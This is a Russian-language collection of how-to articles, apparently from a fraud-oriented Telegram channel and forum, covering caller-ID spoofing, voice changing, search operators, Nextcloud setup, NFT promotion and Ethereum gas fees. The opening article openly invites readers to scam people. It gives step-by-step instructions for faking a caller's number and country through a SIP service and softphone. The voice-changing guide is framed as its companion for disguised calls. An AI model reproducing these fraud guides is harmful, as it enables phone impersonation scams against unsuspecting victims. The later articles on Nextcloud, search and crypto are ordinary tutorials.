Хочешь заскамить человека, подделав номер входящего звонка и страну? Тогда эта статья придется тебе по вкусу, потому что сегодня мы научимся менять номер вызывающего абонента или заниматься спуфингом.

https://i.gyazo.com/1c05e7798bf807cbb8ec81eef43e2cc2.jpg

В переводе с английского spoofing - кибератака с подменой. Выделяют разные виды спуфинга:


Caller ID Spoofing (подмена номера входящего вызова)

Text Message Spoofing (подмена сообщений)

IP Spoofing (подмена IP-адреса)

Website Spoofing (подмена сайта)

DNS Server Spoofing (подмена DNS-сервера)

Email Spoofing (подмена адреса электронной почты)

GPS Spoofing (подмена GPS)


В этой статье мы же выделим один из основных видов мошенничества - Caller ID Spoofing.


https://i.gyazo.com/ae9f4df61f17b8874be4336b0de2df4e.jpg

Мануал:

1. Регистрация

Первым действием вам, конечно же, нужно включить VPN. Это необходимо не только для вашей безопасности, но и для того, чтобы зарегистрироваться на сайте CallWithUs, в противном случае вы не сможете зайти на него. Это не единственный сервис для совершения звонков с подменой номера. Также можно выделить и Sip24.pw.

Сегодня же мы вам покажем, как работает спуфинг на примере CallWithUs. Как только вы зашли на сайт, нажмите в верхней панели кнопку "Sign Up", для регистрации используйте левые данные и временную почту. Например, Temp Mail.

2. Устанавливаем X-Lite

X-lite - это популярный бесплатный программный sip телефон для Windows, MacOs и Linux. X-lite на ваш компьютер можно скачать тут.

После того как скачали и установили, заходим во вкладку "VoIP Accounts" и берем оттуда данные для входа на X-lite.

3. Цена

Для того, чтобы программа работала, необходимо пополнить баланс на CallWithUs. Цены довольно низкие, вы сами создаете свой собственный план обслуживания, включая только те функции, которые вам нужны. Ежемесячного и безлимитного пакетов нет, вы платите только по факту в отличие от многих других телефонных компаний.

4. Настраиваем X-Lite

Запускаем приложение X-Lite, нажимаем на "SIP Account" и затем прописываем следующее:

User ID - @CALLWITHUS_USERNAME@ Domain - sip.callwithus.com Password - @CALLWITHUS_PASSWORD@

5. Выбираем страну

Для того, чтобы выбрать страну входящего звонка, вам нужно нажать "Speed Dial" -> "Select Dialing rule". Если хотите ее поменять, то замените "0" на код страны. Например: 7 - Россия.

6. Устанавливаем номер

Теперь осталось только выбрать номер телефона. Для этого открываем вкладку "Add Caller" и напротив "VoIP Account" вписываем любой номер и подтверждаем "true".

Готово! Теперь ваш собеседник увидит тот номер, который вы сами установите. Таким же образом вы можете менять код страны и номер телефона каждый раз, когда вам нужно.

Текст статьи не является призывом к действию и публикуется для ознакомления со спуфингом в целях защиты.

https://telegra.ph/Poddelyvaem-nomer-telefona-02-08

https://i.gyazo.com/ade75d0b568bee827877c4a38b1c471e.jpg

Как изменить свой голос при телефонном разговоре?

Вступить в наш чат

Причин из-за которых вам может понадобится изменить свой голос довольно много: начиная от безобидного розыгрыша и заканчивая чем-то похуже. Зачастую смена номера телефона и голоса работают в тандеме. Вы не можете звонить с левого номера, но при этом говорить своим голосом. Думаю, что нет нужды объяснять почему так делать нельзя. В прошлой статье мы научились подделывать номер телефона, поэтому сейчас самое время поговорить про изменение голоса.



Когда разговор заходит про специальные программы по изменению голоса, то стоит упомянуть, что большинство из них заточены под пранки, т.е. максимум, что вы сможете сделать - это наложить определенные звуковые эффекты поверх вашего голоса (хомяк, робот, президент). Если вашей целью не стоит розыгрыш друга, то такие программы вам мало чем могут помочь. Найти хорошую программу для смены голоса очень трудно, но нам удалось это сделать и сегодня мы поделимся ею с вами.

MorphVox Pro

MorphVox Pro считается ̶о̶д̶н̶о̶й̶ ̶и̶з̶ ̶с̶а̶м̶ы̶х̶ ̶л̶у̶ч̶ш̶и̶х̶ самой лучшей программой для изменения голоса. (И да, это не реклама.) Несмотря на простой внешний вид в вашем распоряжении большое количество функций и многоуровневая настройка звучания, благодаря которой вы можете изменить свой голос до неузнаваемости и при этом сохранить естественность звучания. Секрет естественного звука кроется в новаторской системе подстройки звука под речь другого человека, чьи параметры уже есть в его базе. Помимо базовых настроек вы также можете установить дополнительные аддоны для увеличения функциональности. Они добавляются через встроенный менеджер, находящийся в меню.

Несмотря на наличие фэнтезийных настроек, есть конфигурации, которые в прямом смысле этого слова помогут вам побывать в "шкуре" другого человека.

Дополнительные возможности

Данная программа имеет ряд и других возможностей помимо главной - изменение голоса в реальном времени.

Ручная настройка. Незаменимая функция, с помощью которой вы можете создать свой собственный уникальный голос или же видоизменить настройки готовых голосов.

Фоновые эффекты. Во время разговора мы можете наложить любые аудиоэффекты так, чтобы собеседник думал, что вы находитесь в определенном месте (в аропорту, в магазине, на улице и т.д.).

Файлы. Если вам нужно изменить звук уже у готовой аудио или видеозаписи, то у вас есть такая возможность. Просто загрузите файл, после чего он будет обработан и сохранен в указанном пользователем месте.


Настройка голоса

Сейчас мы с вами разберем настройку голоса и основные параметры.

1. В меню слева есть уже готовые шаблоны голосов, нажмите "Voice Selection" и просто выберите нужный пол, например, мужской. Если вам не нравятся стандартные голоса и готовые настройки, то вы всегда можете скачать дополнения. Просто перейдите "Voice Selection" -> "Get more voices".

https://i.gyazo.com/eddc00dc93572fceccfae1bed38cbe47.jpg

2. После выбора пресета вы можете оставить его изначальные настройки (но мы так делать не будем) или покрутить ползунки в "Tweak Voice". Чтобы изменить тон голоса, увеличить или уменьшить, подвигайте ползунок "Pitch shift". Для настройки тембра используйте "Timbre" -> "Shift" -> "Strength". Если вы хотите сохранить изменения, то нажмите на "Update Alias".

https://i.gyazo.com/4208ca37a4f982a84d0a54c37447f767.jpg

3. Далее советуем настроить частоты звука с помощью эквалайзера. Для него уже есть несколько настроенных шаблонов для более низких и высоких частот в разделе "Preset".

https://i.gyazo.com/a89bdf9a7eac6a38fc8caa34ab44b615.jpg

https://i.gyazo.com/6855fb34488da9a542293f1f112f5716.jpg

Если готовые настойки не для вас, то опять же на помощь приходит ручная настройка, остается только подобрать частоту с помощью 10 ползунков, а изменения сохранить кнопкой "Update Alias".

4. Улучшаем звук и подавляем шум. В "Sound Settings" есть ряд возможностей для улучшения звучания вашего голоса. И кроме этого вы можете убрать те шумы, которые возникают при нахождении в общественных местах.

https://i.gyazo.com/0bfcb19283b4a00c0379b87a46f05a6d.jpg

На этом наша настройка заканчивается. Программа MorphVox Pro легкая в использовании, поэтому вы без проблем сможете настроить голос по своему усмотрению, даже будучи новичком.

Плюсы


Простой и многофункциональный интерфейс;

Наличие дополнительных возможностей;

Гибкая настройка голоса.
Минусы

1. Программа платная. Но мы можете воспользоваться пробным периодом - 7 дней. Если же вы все-таки решите приобрести данную программу, то она обойдется вам почти в 40 долларов;

https://i.gyazo.com/600515be051bb7363ac5b2aea61e5a82.jpg

2. Программа только на английском языке.

Итог

Безусловно, это не единственная программа с подобным функционалом, но она по праву считается лучшей благодаря естественной настройки звучания. У вас не должно возникнуть никаких сложностей в использовании, разве что только придется действовать методом научного "тыка" из-за большого количества ползунков.

На этом все. Удачи, друзья!

https://telegra.ph/Kak-izmenit-svoj-...azgovore-02-23

https://i.gyazo.com/021312149bedc11c8715988f0d90dff1.jpg

Как быстро найти данные в бесконечном потоке информации

Вступить в наш чат



Поисковые системы (Google, Yandex) ежедневно используются миллиардами людей для нахождения какой-либо информации. Но мало кто знает о скрытых возможностях, которые упрощают поиск, освобождая его от лишний информации, а также экономят ваше время. Речь в сегодняшней статье пойдет о поисковых операторах.


Как работают поисковики?

Выделяют три основных этапа работы поисковых систем:


Сканирование. За первый этап отвечает поисковой робот или паук. Он собирает и отбирает информацию с сайтов, анализирует изменения в контенте, URL-адреса, а также код и карты сайтов. Все это делается для того, чтобы определить тип отображаемой информации.

Индексация. Как только сканирование завершается, индексатор организовывает и совершает быстрый поиск по собранной информации, т.е. анализирует данные сайта.

Поисковик. На последнем этапе происходит сортировка сайтов в зависимости от предпочтений запроса, качества и степени соответствия. Таким образом, перед нами предстает контент на странице результатов поиска.
Поисковые операторы

Что такое операторы информации и зачем они нужны?

Поисковые операторы - это специальные слова, символы, фразы, включенные в поисковой запрос, помогают конкретизировать запрашиваемую информацию для выдачи максимально точного результата. Главная их задача - это отфильтровывать запросы с определенным содержимым, сузить данные, исключая ненужную информацию. Вы можете комбинировать операторы друг с другом, чтобы поиск был еще продуктивнее.

Google

Простые поисковые операторы:

+ запрос по нужным словам в одном предложении. Оператор "плюс" помогает в конкретизации поиска. Например, возьмем слово "ключ", которое имеет несколько значений, поэтому чтобы получить тот результат, которые нам нужен, мы уточним запрос: ключ +скрипичный, ключ +родник, ключ +гаечный. В итоге вы получаете те сайты, в которых есть полный набор слов из запроса.

https://i.gyazo.com/99409c2f3e884ed9a0c3a66437d7bf79.jpg

- оператор "минус" наоборот исключает слово из запроса. Делая запрос "Ключ -скрипичный", вы получите любую информацию кроме скрипичного ключа.

https://i.gyazo.com/3e1e74fafb2a3ff4d4d93d65dcc37f7a.jpg

"" показывают только те страницы, где фраза идет в точно написанной последовательности.

https://i.gyazo.com/3b18688f5372e372ba108af9c5a165f1.jpg

| (OR) оператор «или», вы можете использовать любой из двух вариантов, чтобы получить запрос по нескольким словам одновременно или по одному из предложенных

https://i.gyazo.com/66a0fd16d31c23701e55e9a1cc6f3e3f.jpg

.. две точки отображают результаты поиска, имеющие конкретных цифровой диапазон. Также обратите внимание, что мы комбинировали 2 поисковых оператора.

https://i.gyazo.com/d41af21896e57a136f83cf5f171f8d73.jpg


@и# – операторы для поиска информации в соц. сетях по тегам и хештегам.

https://i.gyazo.com/0e116e8cd2d00a3cb4d7886817a52e06.jpg


Сложные поисковые операторы:

site:оператор, который ищет информацию на определенном сайте.

https://i.gyazo.com/b93ce863d2779f3cde3ab0ae85bb2a77.jpg

related: оператор для поиска сайтов с похожим контентом.

https://i.gyazo.com/bd07ad6a2b1447af5f1f0e37303e5b1a.jpg

intitle: поиск страниц по заголовку.

https://i.gyazo.com/8da966093282f7471794af5dc005a645.jpg


allinurl: оператор, с помощью которого легко найти сайты, содержащие в адресе страницы указанные слова. Для большего отображения страниц лучше всего использовать транслитерацию, либо латиницу.

https://i.gyazo.com/e2da4ed447bd7b85ea0540cf49ff325e.jpg

allintext: поиск по содержимому страницы. Хороший способ найти сайт, если его адрес вы забыли.

https://i.gyazo.com/f7866f8031d837f1264d0b6084590b9f.jpg

intext: поиск как и с предыдущем оператором, только выборка страниц производится по текстовому описанию для одного слова.

info: служит для показа всей информации об адресе.

allinanchor: отбирает страницы с ключевыми словами.

inanchor: похожий оператор, который ищет только по одному заданному слову.

Яндекс

Поисковые операторы:

+ оператор "плюс" работает так же как и у Google.

! используется перед нужным словом для его точного отображения в поиске без изменений.

"" показывают только те страницы, где фраза идет в точно написанной последовательности, как и в Google.

* используется для замещения слов в фразах, песнях, цитатах. Помогает в случае, если вы забыли нужное слово.

( ) оператор "скобки" служит для группировки слов в сложных запросах.

& ставится между двумя словами, а поисковик ищет страницы, где эти слова находятся в одном предложении.

title: оператор, который ищет по заголовкам сайтов.

mime: помогает найти документы нужного формата, к примеру mime












https://darkmoney.one/images/smilies/tongue.gif

df.

site: выборка по всем страницам сайта.

inurl: находит страницы только с ключевыми словами данного домена.

Как составлять запрос:


Искать в разных поисковых системах;

Искать одну и ту же информацию на разных языках (английский);

Менять порядок слов;

Использовать синонимы;

Ну и, конечно же, использовать поисковые операторы.


https://telegra.ph/Kak-bystro-najti-...formacii-03-30

https://i.gyazo.com/c0af467638f843ec7dcefeb80ba23681.jpg

Вступить в наш чат


Nextcloud - это альтернатива Dropbox, Google Drive, Onedrive со своими значительными преимуществами. Это программное обеспечение с открытым исходным кодом, которое позволяет хранить личные данные, не переживая за их безопасность, так как информация хранится на подконтрольном сервере. Самой интересной фишкой данного хранилища является то, что оно может выступать не только в роли файлового хостинга, но и закрытого сообщества, где вы можете общаться с помощью аудио и видео звонков, переписываться или вовсе превратить хранилище в рабочее пространство. Доступ к Nextcloud возможен с любых устройств, например, с телефона или компьютера.


https://i.gyazo.com/70b68f88c8fd31c1036a9bf702519085.jpg

Сегодня мы научимся настраивать облачное хранилище менее чем за пол часа.

Скачать Nextcloud

Устанавливаем Next Cloud


В качестве серверной системы мы будем использовать Ubuntu 20.04.


Настройка будет осуществляться с помощью системы пакетов Snap. Она по умолчанию доступна в Ubuntu 20.04. Это означает, что процесс установки будет максимально простым., так как вместо установки и настройки веб-сервера и сервера базы данных и настройки приложения Nextcloud для работы с ними мы можем установить пакет snap, который автоматически настроит все системы.


Чтобы загрузить пакет Nextcloud snap и установить его в системе, введите:


sudo snap install nextcloud Пакет Nextcloud будет загружен и установлен на ваш сервер. Вы можете проверить успешность установки посредством вывода изменений, связанных с пакетом snap:
snap changes nextcloud

Output ID Status Spawn Ready Summary 4 Done today at 16:12 UTC today at 16:12 UTC Install "nextcloud" snap Информация о состоянии и сводная информация показывают, что установка была выполнена без проблем.

Дополнительная информации о Nextcloud SnapЕсли вам нужна дополнительная информация о Nextcloud snap, вам могут помочь несколько полезных команд.
Команда snap info показывает описание, доступные команды управления Nextcloud, установленную версию и отслеживаемый канал snap:
snap info nextcloud Посмотреть сетевые интерфейсы пакета:
snap interfaces nextcloud Результат:
Output Slot Plug :network nextcloud :network-bind nextcloud - nextcloud:removable-media Посмотреть список служб пакета:
cat /snap/nextcloud/current/meta/snap.yaml

Настраиваем учетную запись NextcloudСоздание учетной записи Администратора:
sudo nextcloud.manual-install имя пароль Вместо «имя» вводим имя администратора учетной записи и вместо слова «пароль» вводим непосредственно придуманный пароль для учетной записи.
Следующее сообщение указывает, что настройка Nextcloud выполнена правильно:
Output Nextcloud was successfully installed После установки Nextcloud нам необходимо настроить доверенные домены, чтобы Nextcloud реагировал на запросы с использованием доменного имени или IP-адреса сервера.

Настраиваем доверенные домены

Первый способ:

Для доступа к Nextcloud мы будем использовать доменное имя сервера или IP-адрес, и поэтому нам нужно изменить эту настройку, чтобы можно было применять запросы этого типа.
Вы можете просмотреть текущие настройки, запросив значение массива trusted_domains:
sudo nextcloud.occ config:system:get trusted_domains

Output localhost В настоящее время в массиве содержится только первое значение localhost. Мы можем добавить запись для доменного имени или IP-адреса нашего сервера, введя следующее:
sudo nextcloud.occ config:system:set trusted_domains 1 --value=example.com

Output System config value trusted_domains => 1 set to string example.com Если мы снова запросим значение trusted domains, мы увидим уже две записи:
sudo nextcloud.occ config:system:get trusted_domains

Output localhost example.com

Второй способ:

Если у вашего сервера Nextcloud нет доменного имени, вы можете защитить веб-интерфейс, создав сертификат SSL с собственной подписью. Этот сертификат обеспечит доступ к веб-интерфейсу через шифрованное соединение, но не сможет подтверждать подлинность вашего сервера, и поэтому ваш браузер может вывести предупреждение при попытке открыть сервер.
Чтобы сгенерировать сертификат с собственной подписью и настроить Nextcloud для его использования, введите:
sudo nextcloud.enable-https self-signed

Output Generating key and self-signed certificate... done Restarting apache... done Показанный выше результат означает, что Nextcloud сгенерировал и активировал сертификат с собственной подписью.
Теперь, когда вы защитили интерфейс, откройте веб-порты брандмауэра, чтобы разрешить доступ к веб-интерфейсу:
sudo ufw allow 80,443/tcp

Настройка успешно завершена.

Входим в Nextcloud
Поскольку вы уже настроили учетную запись администратора из командной строки, вы перейдете на страницу входа Nextcloud. Введите учетные данные, которые вы создали для администратора:


https://i.gyazo.com/def32381d1a9a2c8d5b7c17c755673bd.jpg

Нажмите кнопку "Войти" для входа в Nextcloud.

При первом входе откроется окно с приветственным текстом и ссылками на различные клиенты Nextcloud:

https://i.gyazo.com/d935caa94c211e89097309bfc6d546e8.jpg

Загрузите любые клиенты, которые вам интересны. Далее вы перейдете в главный интерфейс Nextcloud, где сможете выгружать файлы и управлять ими:

https://i.gyazo.com/579fb321fccbdf63e298a02605858781.jpg

Дополнительные настройки NextCloud

В NextCloud доступно огромное количество приложений для расширения функциональности:


Auto Groups – автоматическое добавление пользователей в группы;

Checksum – вычисление хеш-сумм файлов (md5, sha1, sha256, sha384, sha512 и crc32);

Music – удобный аудио плеер;

News – приложение для чтения новостей с помощью формата RSS/Atom;

ONLYOFFICE – офисное приложение для создания и редактирования документов. Созданные документы автоматически сохраняются в облаке;

Registration – добавление опции регистрации на главной странице;

Social login – регистрация с помощью соц. сетей;

Social – чат;

Talk – видео и аудио звонки, создание комнат для обсуждения. Для мобильных устройств доступно отдельное приложение.



В следующей статье мы более подробно рассмотрим начало работы в Nextcloud, полезные фишки и различные настройки.


Заключение

Nextcloud - это многофункциональное программное обеспечение, которое является не только облачным хранилищем, но и целой сетью, где можно общаться, слушать музыку, работать и совершать конференции. И самое главное, что все данные хранятся в защищенном месте, которое вы сами и контролируете.

https://i.gyazo.com/14659b57e95363fa5fe8553d283038c4.jpg

Вступить в наш чат



Nextcloud - это не просто облачное хранилище, а это целое сообщество, где можно чатиться, совершать аудио и видео звонки, и при этом оставаться анонимным.

В прошлой статье мы научилисьнастраивать Nextcloud, а сегодня поговорим об основных функциях,

о которых вам следует знать.



https://i.gyazo.com/cedee2c83d3f3327bcea86bd09bd52a2.jpg

Начало работы

После установки Nextcloud выглядит как обычное файловое хранилище.

Но это легко поправимо, мы покажем как установить на него дополнительные приложения, чтобы повысить его функциональность. В правом верхнем углу нажимаем на иконку пользователя и выбираем "Приложения"

https://i.imgur.com/Qflv0ik.jpg

https://i.gyazo.com/526e09836c2947d90748aa4c77d55105.jpg

В разделе «Пакеты приложений»находится огромный список программ. Узнать подробнее о каждой программе можно, нажав на ее заголовок. Нам же более интересен «Основной набор приложений» : вы можете можно включить как все приложения, так и отдельные. Затем введем пароль администратора, и установка начнется. По ее завершению иконки приложений вы найдете в верхней панели.

Как добавить учетные записи

Для того, чтобы использовать Nextcloud совместно с другими пользователями, вам нужно добавить их учетные записи. Сделать это можно, выбрав в правом верхнем углу иконку администратора -> «Пользователи»:

https://i.gyazo.com/54bb46aea0bef4075f1ecd6cf38143f7.jpg

Для удобства можно создать дополнительные группы, чтобы установить уровень доступа. По умолчанию есть группа «Администраторы» с полным доступом к приложению, но вы можете создать, например, группу «Сотрудники» и добавлять туда учетные записи с лимитированным доступом, например, тех, кому пользоваться приложениями можно, а менять настройки Nextcloud уже нельзя:

https://i.gyazo.com/61b2f7b6d281e623ce7ebd8498818ca3.jpg

Придумываем логин, указываем отображаемое имя, пароль, почтовый ящик, присваиваем группу и устанавливаем ограничение дискового пространства для каждого пользователя.

Как настроить дополнительные инструменты

После того как добавили пользователей, переходим к настройке дополнительных функций.

Календарь

Календарь может понадобится для работы: указать конкретные задачи, обозначить сроки и т.д. Попасть в раздел календаря вы можете в верхнем меню приложений:

https://i.gyazo.com/7c75d21921f15011932a2f6192d1ec71.jpg

Импорт готового календаря

Допустим, у вас уже есть готовый календарь со всеми событиями и задачами, и вы только хотите загрузить его в Nextcloud. Для этого экспортируйте его в файл .ics и загрузите в наше приложение в разделе Параметры и импорт -> Import Calendar.

https://i.gyazo.com/11c729ed958363836da60bea37ba4276.jpg

Создание нового календаря

Если готового календаря у вас нет, то давайте создадим новый таким способом:

https://i.gyazo.com/2c985ebeda77efec3045ebfa2077c35f.gif


1. Кликните на кнопку + Создать календарь в левой части экрана.

2. Запишите название, например, Работа.

3. Нажмите на «галочку» - календарь будет создан, а все события будут доступны с любых устройств для всех пользователей, которых подключите к нему.
Подключить пользователей к календарю можно вручную, добавляя каждого отдельно или всю группу, например, «Сотрудники». Но вы также можете предоставить доступ к календарю с помощью ссылки -> "Поделиться ссылкой". После того, как пользователи перейдут по ссылке, они сами автоматически добавятся к календарю.

https://i.gyazo.com/452ede769ecc5a6c10265c00104e64b6.jpg

Задачи

Стоит отметить, что календарь и сам неплохо справляется с этой функцией, но если вам нужно более четкое структурирование задач и отслеживание их выполнения, вы можете воспользоваться инструментом Deck.

https://i.gyazo.com/79b781ca717723a7461da5fcc7635874.jpg

На скрине выделена кнопка +Создать рабочую доску, а еще "Поделиться»" и "Параметры" для уже готовых досок.

Если вы "Поделитесь" ссылкой, то автоматически разрешите доступ конкретному человеку или группе пользователей.

https://i.gyazo.com/f4a0c6caf579670855aebe0a67580a74.jpg

На странице "Параметры" вы можете вносить любые изменения: переименовать доску, удалить ее или добавить в архив. В созданной доске каждый желающий пользователь с доступом может вносить изменения в задания. Сначала создаются списки с категориями заданий, в каждый список можно добавлять карточки со списками конкретных задач.

Далее составляются списки заданий, в каждом из них можно добавлять карточки с определенными заданиями. С помощью меток статуса можно определить статус задания и его выполнение. Также к каждой задаче можно прикреплять сотрудника, устанавливать срок выполнения, загружать дополнительные файлы и приложения.

https://i.imgur.com/DTzVHCJ.jpg



Вступить в наш чат
NFT-токен - это уникальный, подлинный цифровой актив, который нельзя заменить на любой другой. Поскольку спрос на невзаимозаменяемые токены стремительно растет, вы можете не только инвестировать в NFT, но и попробовать создать свои собственные. Если вы это уже сделали, то наверняка столкнулись со следующей проблемой: "Как их продвигать?". Заручиться поддержкой аудитории и повысить свою узнаваемость - дело не из легких. Однако, существуют способы, которые помогут вам это сделать. О них мы и поговорим в этой статье.

https://i.imgur.com/SB7ijvs.jpg

рост популярности NFT

Для начала вспомним, в виде чего мы можем создавать NFT:

Фото/видео

Арт

Музыка

Gif

Предметы в играх

Твиты



Самые дорогие NFT за всю историю

Чтобы приобрести любой NFT достаточно зарегистрироваться на любой площадке вроде Binance и создать счет. Далее смотрим доступные к покупке токены и жмем "Купить".Готово.

https://i.imgur.com/iqAk180.jpg

Если с покупкой все более менее понятно, то как быть с продажей?

Платформа

В первую очередь следует выбрать и зарегистрироваться на платформе. У каждой из них есть свои отличия и особенности, поэтому окончательное решение остается за вами. Главное, на что необходимо обратить внимание - это наличие Ethereum.

Кошелек

Затем нужно открыть свой Ethereum кошелек. Лучшими NFT-кошельками единогласно признают:

Metamask

AlphaWallet

Trust Wallet

Coinbase Wallet

Enjin
А теперь самое главное - продвижение:

Создайте блог про NFT

Главное, что вы должны знать про продвижение NFT, так это то, что оно напрямую взаимосвязано с продвижением вашего блога, т.е. вы должны продвинуться в соц. сетях перед тем, как начать продавать NFT. "Впаривать" аудитории свои токены не нужно, поначалу вы должны в стать проводником для них в мир невзаимозаменяемых токенов, так как до сих пор многие люди не имеют ни малейшего понятия, что это такое.

Запомните, что клиент никогда не купит то, о чем он не знает, поэтому взгляните на это с другой стороны, вспомните, когда вы первый раз узнали про NFT, что вам было интересно. Расскажите им, что такое NFT,метавселенная, про отличие от другой криптовалюты, самые дорогие токены, зачем нужно инвестировать в NFT и как их можно купить и продать. Чем больше образовательного контента на первых порах, тем лучше же для вас.

Где вести свой блог? Не стоит заводить аккаунты во всех социальных сетях, так как это слишком энергозатратно, достаточно сосредоточиться на 4 основных платформах, там вы сможете найти свою целевую аудиторию:

Instagram

Twitter

BitCoinTalk

Telegram
Расположив к себе подписчиков и став для них неким экспертом в области NFT, вы сможете быстрее продать свои токены в дальнейшем.

Покупайте рекламу

Иногда единожды удачно купленная реклама стоит года тщетных попыток продвинуть аккаунт. Не думайте, что, создав блог, к вам полетят тысячи подписчиков. К сожалению, так бывает, но очень редко, чаще всего продвижение стоит денег.

Но для того, чтобы не спустить эти деньги на ветер, найдите подходящего инфлюенсера, который в своем аккаунте расскажет про ваш замечательный блог. Важно, чтобы тематика ваших аккаунтов совпадала (он рассказывает про биткоины, а вы про NFT), в противном случае после такого продвижения подписчиков не прибавится. Если не хотите заморачиваться с поиском инфлюенсера, то настройтесь таргетинговую рекламу в Instagram. Ключевым словом является "таргетинговая", т.е. реклама для тех людей, которые были бы заинтересованы в покупке NFT в данный момент. Это легко делается с помощью инструментов в инстаграме.

SEO

Повысьте свою узнаваемость с помощью SEO (приемы, которые помогают поднять вас в топ рейтинга поисковых систем). Как вы собираетесь продавать NFT, если ваше имя не отображается в результатах поиска? Данный шаг очень важен, если вы хотите, чтобы клиенты вас могли найти самостоятельно.

Если вы не дружите с поисковой оптимизацией, то не раздумывая, обратитесь к SEO-специалистам.

Самопиар

Как только вы наберете N-количество подписчиков, время действовать. Расскажите клиентам про тему ваших NFT, что вы создали, какие проекты вы готовите. Делайте акцент на контент-маркетинге, так это поможет деликатно ознакомиться потенциальных покупателей с вашими токенами. Сделать самопиар ненавязчивым можнос помощью нескольких уловок:

Краткость - сестра таланта. Не пишите длинные статьи, их никто не будет читать, ваша задача - передать суть несколькими предложениями. А еще пытайтесь выражать мысли простым языком без использования заумных фраз и прочих сложностей;

Используйте слова- триггеры (с призывами). Что-то вроде "Получите бесплатный NFT", "Только сегодня скидка 50 %". Это действительно работает.

Срочность. Внушите подписчикам, что ваше предложение ограничено, сказав, что скидка действует только сегодня или предложение истекает через час. Этот способ будет работать в том случае, если вы не будете злоупотреблять им.

Красивый визуал. Это особенно актуально для инстаграма. Позаботьтесь о ярких картинках, инфографике и коротких роликах, тогда ваш пост не останется без внимания.
И, конечно же, не забывайте про дружеский настрой, будьте с подписчиками на одной волне, спрашивайте, что им было бы интересно, отвечайте на их вопросы.

NFT-маркетплейсы

Чтобы продать NFT, вы должны разместить их на нескольких маркетплейсах как на платформах, специализирующихся исключительно на NFT, та и на универсальных площадках. Чем чаще покупатели будут видеть ваши NFT, тем выше шанс, что их купят.

Список самых популярных NFT-маркетплейсов:

Foundation - для диджитал-арта;

MakersPlace - для компьютерной графики;

SuperRare - для цифровых произведений искусства;

OpenSea - для предметов искусства, фото, музыки, спортивных карточек и коллекционных гифок;

Rarible - для коллекционных крипто-предметов;

Enjin — для активов блокчейна;

KnownOrigin - для редких коллекционных предметов искусства;

MythMarket - для коллекционных карточек.


Прокачайте PR

Распространяйте информацию о своих NFT по крупным информационным площадкам, СМИ. Если нет конкретной договоренности с изданием, напишите пресс-релиз, расскажите о своих токенах и разошлите журналистам. Не ждите, что к вам постучаться в дверь с просьбой взять у вас интервью - будьте тем кто сам стучиться во все двери, стараясь ухватиться за любую возможность.

Оптимизируйте коэффициент конверсии - CRO

Все ранее перечисленное должно давать положительный эффект на конверсию, иначе ни в контент-маркетинге, ни в PPC-рекламе смысла нет. Поэтому постоянно контролируйте показатели конверсии и меняйте стратегию продвижения, если они падают, а не повышаются.

Чтобы повысить доверие к вам - публикуйте отзывы клиентов, продумывайте подачу контента (о чем конкретно писать, на каких площадках размещать, в какие дни публиковать). Таким образом, вы должны продумать каждую деталь, чтобы ваше дело принесло плоды.

Итог

Пока другие только узнают о существовании NFT, будьте теми, кто поможет им разобраться во всех тонкостях невзаимозаменяемых токенов. Не бойтесь неудач, грамотно выстраивайте свой бизнес план, дабы их избежать. Удачи!


Интересно узнать, как заключенный смог стать успешным NFT- художником, заработав миллион? - Читайте здесь.

https://i.gyazo.com/c7ef048cf759d7ef47b28d74e40a1367.jpg

Вступить в наш чат



Впервые слышите такое понятие как "газ", хотя уже знакомы с криптовалютой и сетью Ethereum? Тогда эта статья для вас, мы разберемся вместе с вами, что такое GAS и зачем его платят в сети эфира.




https://i.gyazo.com/fb2f32288fae59080cfc37e559d9a42d.jpg

Что такое газ

Простыми словами, газ или GAS - это плата, которая происходит каждый раз, когда вы совершаете операции в сети эфира. Если в сети Bitcoin - комиссия, то в сети Ethereum - это газ.

Таким образом, цена на газ эфира - это обычная комиссия за покупку, добавление своего NFT, вывод денег и практически любое действие, связанное с криптовалютой. Дело в том, что комиссия, она же цена на газ, меняется ежеминутно. Почему это происходит?

Когда пользователи впервые слышат про это, у них появляется еще больше вопросов. К примеру, с Bitcoin все ясно: сеть нужна для переводов крипты, где вы сами устанавливаете комиссию - чем выше комиссия, тем быстрее поступит перевод.

Когда дело заходит про Ethereum, то стоит понимать, что главная задача сети - это поддержка выполнений смарт-контрактов. Это специальная программа для проверок переводов. Помимо это сеть эфира нужна для:


Переводов Эфириума другому пользователю;

Формирования смарт-контрактов (программ) и записи их в блокчейн;

Обеспечения работы этих смарт-контрактов (программ) .
Стоимость газа

Когда вы пользуетесь блокчейном, вы, сами того не осозновая, используете мощности компьютеров других пользователей, которые как раз и берут за это комиссию или плату за газ.

Плата за газ может изменяться, смотря на загруженность блокчейна и сложность задачи. Если помимо вас совершает транзакцию большое количество других пользователей, то цена на газ растет, так как в блокчейне эфира есть лимит на транзакции - 30 за 1 секунду. Так что, пользователи, которые не хотят ждать большой очереди, платят повышенную комиссию. Повышенный спрос на операции прямо пропорционален цене газа.

Также отмечают, что рост цены на газ может зависеть от тарифов на коммунальные услуги. Держатели компьютеров, чьими услугами вы пользуетесь, вынуждены обслуживать их, а точнее платить счета за обычное электричество.

https://i.gyazo.com/26b72f4d26194155b12f04d927453d4e.jpg

Как не платить большую комиссию

От цены за газ и лимита газа зависит скорость выполнения транзакции и, если вы поставите очень низкий процент, то время ожидания выполнения операции может увеличиться от нескольких часов до пары дней.

Для того, чтобы не переплачивать за каждую операцию, следует поставить ограничения на цену за газ и на лимит газа.

Лимит газа служит определенным ограничителем платы за перевод. Допустим, вы выставите лимит 1.000.000 газ, а смарт-контракту нужно лишь 50.000 газ, то вы и заплатите только 50.000. Лимит сделан для того, чтобы пользователь не переплатил в таком случае.

Вы сами устанавливаете цену в зависимости от того как быстро вы хотите, чтобы операция прошла. Есть хороший сервис ETH Gas Station, который служит калькулятором, позволяющим подобрать оптимальное значение цены за газ.

https://i.gyazo.com/3b59b11417a1019e541b44e3259919d2.jpg

Вывод

Газ делает обмен между пользователями максимально честным. Хотя вы ежедневно пользуетесь многими сервисами, не платя никакой комиссии, это не делает ваше взаимодействие прозрачным. Вместо платы, вы позволяете собирать о себе данные, показывать вам персонализированную рекламу, а значит - зарабатывать на ваших действиях. Тем не менее, вы можете не переплачивать за газ. Если вы продаете NFT, то выкладывайте свои токены на маркетплейсах, где не требуется оплата за транзакцию. Ну, а если вы инвестируете, то используйте калькулятор газа, чтобы подобрать подходящую комиссию.

https://i.gyazo.com/9441842a548138ccbaeefb8d55cc0933.jpg

Вступить в наш чат


